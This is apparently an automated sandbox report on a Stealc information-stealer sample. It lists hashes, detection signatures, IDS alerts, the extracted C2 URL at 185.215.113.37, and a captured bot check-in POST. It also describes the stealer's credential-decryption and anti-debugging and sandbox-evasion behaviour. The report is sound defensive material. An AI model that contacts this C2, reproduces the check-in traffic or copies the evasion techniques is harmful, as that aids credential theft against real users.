
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523401
MD5: 2b6a17cf5d76f7664806991d7619e998
SHA1: b32948270dcb41941e0f98122f9c9d48a36c199c
SHA256: beb033b6b81e60ed419ba19985a2c7d1ffb6a4bcadf151e4686404079e0c7747
Tags: exe, Stealc, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1656 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2B6A17CF5D76F7664806991D7619E998)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author | Strings):
  • dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
  • 00000000.00000002.2171047770.0000000001043000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 00000000.00000003.2129309705.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • Process Memory Space: file.exe PID: 1656 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  • Process Memory Space: file.exe PID: 1656 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 0.2.file.exe.230000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
  • 2024-10-01T15:22:01.059735+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49710 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.230000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0023C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat 0_2_0023C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00237240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree 0_2_00237240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00239AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree 0_2_00239AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00239B60 CryptUnprotectData,LocalAlloc,LocalFree 0_2_00239B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00248EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA 0_2_00248EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose 0_2_002438B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00244910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose 0_2_00244910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0023DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose 0_2_0023DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0023E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA 0_2_0023E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0023ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose 0_2_0023ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00244570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen 0_2_00244570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0023DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose 0_2_0023DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0023BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose 0_2_0023BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00243EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose 0_2_00243EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0023F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose 0_2_0023F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose 0_2_002316D0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AFBAFBKEGCFBGCBFIDAK | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 34 30 39 33 45 31 32 38 35 41 31 33 36 31 34 39 35 32 39 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 2d 2d 0d 0a | Data Ascii: ------AFBAFBKEGCFBGCBFIDAK Content-Disposition: form-data; name="hwid" 774093E1285A1361495298 ------AFBAFBKEGCFBGCBFIDAK Content-Disposition: form-data; name="build" doma ------AFBAFBKEGCFBGCBFIDAK--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00234880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle 0_2_00234880
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AFBAFBKEGCFBGCBFIDAK | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 34 30 39 33 45 31 32 38 35 41 31 33 36 31 34 39 35 32 39 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 2d 2d 0d 0a | Data Ascii: ------AFBAFBKEGCFBGCBFIDAK Content-Disposition: form-data; name="hwid" 774093E1285A1361495298 ------AFBAFBKEGCFBGCBFIDAK Content-Disposition: form-data; name="build" doma ------AFBAFBKEGCFBGCBFIDAK--
Source: file.exe, 00000000.00000002.2171047770.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171047770.0000000001072000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2171047770.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171047770.0000000001078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2171047770.000000000108A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/:y
Source: file.exe, 00000000.00000002.2171047770.0000000001078000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/am
Source: file.exe, 00000000.00000002.2171047770.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&c
Source: file.exe, 00000000.00000002.2171047770.000000000108A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpEy
Source: file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpj
Source: file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpvca
Source: file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpzcu
Source: file.exe, 00000000.00000002.2171047770.000000000102E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37GD7

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00613965
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0060C147
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B0996
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00610256
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00606ABA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00607BEF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00683BC1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A4C08
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00520439
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00611D7D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0060CDC9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00502D92
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00718E17
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0060E781
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 002345C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: rjfivtba ZLIB complexity 0.9950053175326649
Source: file.exe, 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2129309705.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00249600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle 0_2_00249600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00243720 CoCreateInstance,MultiByteToWideChar,lstrcpyn 0_2_00243720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\5K8V7ISB.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1841152 > 1048576
Source: file.exe | Static PE information: Raw size of rjfivtba is bigger than: 0x100000 < 0x19b600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.230000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rjfivtba:EW;iwmizbgs:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rjfivtba:EW;iwmizbgs:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00249860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress 0_2_00249860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d1064 should be: 0x1c48d2
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: rjfivtba
Source: file.exe | Static PE information: section name: iwmizbgs
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0024B035 push ecx; ret 0_2_0024B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push ebp; mov dword ptr [esp], esi 0_2_00609873
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 5B27CC5Eh; mov dword ptr [esp], edi 0_2_006098F5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 4BAEE901h; mov dword ptr [esp], edx 0_2_00609988
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push edi; mov dword ptr [esp], edx 0_2_006099A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 578D5248h; mov dword ptr [esp], eax 0_2_00609A2C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push esi; mov dword ptr [esp], edx 0_2_00609A4B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push ecx; mov dword ptr [esp], eax 0_2_00609A52
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push esi; mov dword ptr [esp], 4A645633h 0_2_00609AE6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push ebx; mov dword ptr [esp], 7CF9B125h 0_2_00609B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push ecx; mov dword ptr [esp], esi 0_2_00609B76
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 1BD5D112h; mov dword ptr [esp], ebx 0_2_00609BA5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 75129058h; mov dword ptr [esp], ebx 0_2_00609C30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push edx; mov dword ptr [esp], esp 0_2_00609D13
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 3CB9A89Ch; mov dword ptr [esp], eax 0_2_00609E90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 5C84ED41h; mov dword ptr [esp], esi 0_2_00609ED9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push edx; mov dword ptr [esp], ecx 0_2_00609F1B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push eax; mov dword ptr [esp], ebp 0_2_00609F1F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 32403C7Ah; mov dword ptr [esp], ecx 0_2_00609F9C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 0D8CF9D5h; mov dword ptr [esp], edx 0_2_0060A000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push ebp; mov dword ptr [esp], ecx 0_2_0060A03C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push eax; mov dword ptr [esp], ecx 0_2_0060A0C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push edi; mov dword ptr [esp], edx 0_2_0060A165
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push eax; mov dword ptr [esp], ecx 0_2_0060A202
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 1532E82Dh; mov dword ptr [esp], esi 0_2_0060A22F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push ebx; mov dword ptr [esp], eax 0_2_0060A235
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 7FA0CC2Fh; mov dword ptr [esp], ecx 0_2_0060A285
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 7D26C661h; mov dword ptr [esp], ebp 0_2_0060A292
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push 339F1360h; mov dword ptr [esp], eax 0_2_0060A360
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push ebp; mov dword ptr [esp], 2CC1B631h 0_2_0060A3D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609848 push edx; mov dword ptr [esp], eax 0_2_0060A42E
Source: file.exe | Static PE information: section name: rjfivtba entropy: 7.953820033334295

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00249860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress 0_2_00249860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13652
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6187B0 second address: 6187BE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F91A0D1A3DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6187BE second address: 6187C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6177C4 second address: 6177CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6177CA second address: 6177D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F91A12E52FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 617C0D second address: 617C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 617C11 second address: 617C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F91A12E52F8h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F91A12E5304h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 617EC6 second address: 617ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 617ECA second address: 617EF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5305h 0x00000007 ja 00007F91A12E52F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61ACC8 second address: 61ACD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnp 00007F91A0D1A3D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AD30 second address: 61AD3A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F91A12E52F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AE28 second address: 61AE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AEA2 second address: 61AEDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c ja 00007F91A12E52F8h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 nop 0x00000016 mov esi, dword ptr [ebp+122D1A8Fh] 0x0000001c jng 00007F91A12E52FCh 0x00000022 push 00000000h 0x00000024 and cx, 6E9Dh 0x00000029 call 00007F91A12E52F9h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 pop eax 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AEDF second address: 61AEF5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
